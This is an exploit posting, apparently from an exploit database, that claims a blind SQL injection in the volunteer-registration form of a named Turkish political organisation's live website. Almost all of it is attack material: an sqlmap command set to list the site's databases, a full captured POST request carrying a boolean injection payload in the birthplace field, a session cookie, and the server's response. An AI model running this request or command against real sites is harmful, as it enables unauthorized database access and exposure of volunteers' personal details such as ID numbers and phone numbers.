Movement for Change in Turkey Blind SQL Injection Vuln

2021.08.07
M3T4L (BE)
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Movement for Change in Turkey Blind SQL Injection Vuln
# Date: 2021-08-04
# Exploit Author: M3T4L & Ghostname
# Web Site: www.turkichackersrulez.org
# Tested on: Windows

python sqlmap.py -r 1.txt --dbs --batch

1.txt:

POST /gonullu-ol/ HTTP/1.1
Content-Length: 2467
Content-Type: multipart/form-data; boundary=-----Boundary_WVJGTHNLKM
X-Requested-With: XMLHttpRequest
Referer: https://tdp.org.tr/
Cookie: PHPSESSID=65pge6o2eqoeti1q4aajuga2nv; views_453=1; views_450=1; views_447=1; views_383=1; views_376=1; views_440=1; views_420=1; views_403=1; views_81=1; views_421=1; views_374=1; views_169=1; views_166=1; views_394=1; views_89=1; views_155=1; views_91=1; views_92=1; views_160=1; views_437=1; views_156=1; views_377=1; views_90=1; views_451=1; views_80=1; views_350=1; views_386=1; views_168=1; views_419=1; views_328=1; views_355=1; views_446=1; views_452=1; views_428=1; views_449=1; views_416=1; views_436=1; views_365=1; volunteer_step1=%7B%22submit_step1%22%3A%22true%22%2C%22cep_telefonu%22%3A%22555-666-0606%22%2C%22d_ay%22%3A%223%22%2C%22d_gun%22%3A%223%22%2C%22d_yil%22%3A%222020%22%2C%22tckimlikno%22%3A%221%22%2C%22tcyok%22%3A%2291628091376%22%7D; views_314=1; views_318=1; views_326=1; views_324=1; views_356=1; views_74=1; views_73=1; views_70=1; views_152=1; views_151=1; views_75=1; views_69=1; views_71=1; views_77=1; views_150=1; views_153=1; views_154=1; views_323=1; views_312=1; views_317=1; views_310=1; views_316=1; views_325=1; views_322=1; views_327=1; views_321=1; views_320=1; views_311=1; views_296=1; views_305=1; views_295=1; views_173=1; views_176=1
Host: tdp.org.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Content-Type: multipart/form-data; boundary=-----Boundary_VBWNDETJEB

-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ad"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ayrilan_zaman"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="birim"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="calisma_durumu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cep_telefonu"

555-666-0606
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cinsiyet"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="cocuksayi"

0
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="detay_adres"

20
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="dogumyeri_il"

-1' OR 3*2*1=6 AND 000879=000879 -- 
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="dogumyeri_ilce"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_ay"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_gun"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="d_yil"

2020
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="egitimdurumu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="eposta"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="gorus_oneri"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ikametil"

9999
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="ikametilce"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="kangrubu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="katilim_durumu"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="medenidurum"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="meslek"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="sandikgorevlisi"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="soyad"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="tckimlikno"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="tcyok"

91628091376
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="telefonizin"

1
-------Boundary_VBWNDETJEB
Content-Disposition: form-data; name="file"; filename="acunetix.txt"
Content-Type: text/plain

-------Boundary_VBWNDETJEB--

Response

HTTP/1.1 200 OK
Date: Wed, 04 Aug 2021 16:31:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: volunteer_step2=%7B%22ad%22%3A%221%22%2C%22ayrilan_zaman%22%3A%221%22%2C%22birim%22%3A%221%22%2C%22calisma_durumu%22%3A%221%22%2C%22cep_telefonu%22%3A%22555-666-0606%22%2C%22cinsiyet%22%3A%221%22%2C%22cocuksayi%22%3A%220%22%2C%22detay_adres%22%3A%2220%22%2C%22dogumyeri_il%22%3A%22-1%5C%5C%27%20OR%203%2A2%2A1%3D6%20AND%20000879%3D000879%20--%20%22%2C%22dogumyeri_ilce%22%3A%221%22%2C%22d_ay%22%3A%221%22%2C%22d_gun%22%3A%221%22%2C%22d_yil%22%3A%222020%22%2C%22egitimdurumu%22%3A%221%22%2C%22eposta%22%3A%221%22%2C%22gorus_oneri%22%3A%221%22%2C%22ikametil%22%3A%229999%22%2C%22ikametilce%22%3A%221%22%2C%22kangrubu%22%3A%221%22%2C%22katilim_durumu%22%3A%221%22%2C%22medenidurum%22%3A%221%22%2C%22meslek%22%3A%221%22%2C%22sandikgorevlisi%22%3A%221%22%2C%22soyad%22%3A%221%22%2C%22tckimlikno%22%3A%221%22%2C%22tcyok%22%3A%2291628091376%22%2C%22telefonizin%22%3A%221%22%7D; expires=Wed, 04-Aug-2021 17:31:34 GMT; Max-Age=3600
X-Powered-By: PleskLin
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ptHlG8gftwSsZLoGiv260DUn3F4%2BSTpk20rw%2FsWMjPTGx83veJZvnELDlKxW01ffCFfAzuNPsUnp41UPm7aIe6F%2BNiTJY0%2BhZO%2FdxcmQK4SFrOyOZJr1WQIedAYS"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 67992d3d3889b75d-CDG
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Original-Content-Encoding: gzip
Content-Length: 104795



Copyright 2024, cxsecurity.com

 
